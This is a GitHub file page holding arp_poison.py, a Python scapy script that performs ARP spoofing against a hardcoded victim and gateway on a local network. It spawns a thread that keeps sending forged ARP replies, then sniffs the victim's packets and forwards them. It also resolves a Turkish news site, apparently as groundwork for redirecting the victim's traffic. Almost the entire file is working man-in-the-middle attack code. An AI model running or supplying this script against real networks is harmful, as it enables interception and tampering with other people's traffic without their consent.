-
Notifications
You must be signed in to change notification settings - Fork 2
/
arp_poison.py
99 lines (70 loc) · 2.07 KB
/
arp_poison.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
# -*- coding: utf-8 -*-
from optparse import OptionParser
import threading
import time
import sys
from scapy.all import *
from scapy import *
VICTIM_IP = '192.168.107.45'
VICTIM_MAC = ''
GATEWAY_IP = '192.168.107.1' #router
GATEWAY_MAC = ''
ATTACKER_IP = ''
ATTACKER_MAC = ''
class ArpPoisonThread(threading.Thread):
def __init__(self, arp_response):
threading.Thread.__init__(self)
self.arp_response = arp_response
self.cont = True
def finish(self):
self.cont = False
def run(self):
while self.cont:
send(self.arp_response)
def hurriyet_to_zaman(packet):
if IP in packet and packet[IP].src == VICTIM_IP:
packet.show()
packet[Ether].dst = GATEWAY_MAC
packet.show()
send(packet)
def main():
global VICTIM_IP, VICTIM_MAC
global ATTACKER_IP, ATTACKER_MAC
global GATEWAY_IP, GATEWAY_MAC
#Zaman DNS çözümle
ans, unansw = sr(IP(dst="193.255.97.2")/UDP()/DNS(rd=1,qd=DNSQR(qname="www.zaman.com.tr")))
dns_answer = ans[0][1]
dns_answer.show()
#gateway'in mac adresini öğren
ans, unansw = sr(ARP(hwdst=ETHER_BROADCAST,
pdst=GATEWAY_IP))
arp_response = ans[0][1]
GATEWAY_MAC = arp_response.hwsrc
#broadcast ARP isteği oluştur.
arp_request = ARP(hwdst=ETHER_BROADCAST,
pdst=VICTIM_IP)
#ip ve mac adresimi öğren.
ATTACKER_MAC = arp_request.hwsrc
ATTACKER_IP = arp_request.psrc
print ATTACKER_MAC, ATTACKER_IP
#hedef bilgisayarın mac adresini öğren.
ans, unansw = sr(arp_request)
arp_response = ans[0][1]
VICTIM_MAC = arp_response.hwsrc
#arp yanıtını daha sonra göndermek üzere zehirle.
arp_response.hwsrc = ATTACKER_MAC
arp_response.hwdst = VICTIM_MAC
arp_response.psrc = GATEWAY_IP
arp_response.pdst = VICTIM_IP
arp_poison_thread = ArpPoisonThread(arp_response)
arp_poison_thread.start()
#sniff_thread = SniffThread()
#sniff_thread.start()
try:
sniff(prn=hurriyet_to_zaman, count=10000)
except (KeyboardInterrupt, SystemExit):
arp_poison_thread.finish()
sys.exit()
raise
if __name__ == '__main__':
main()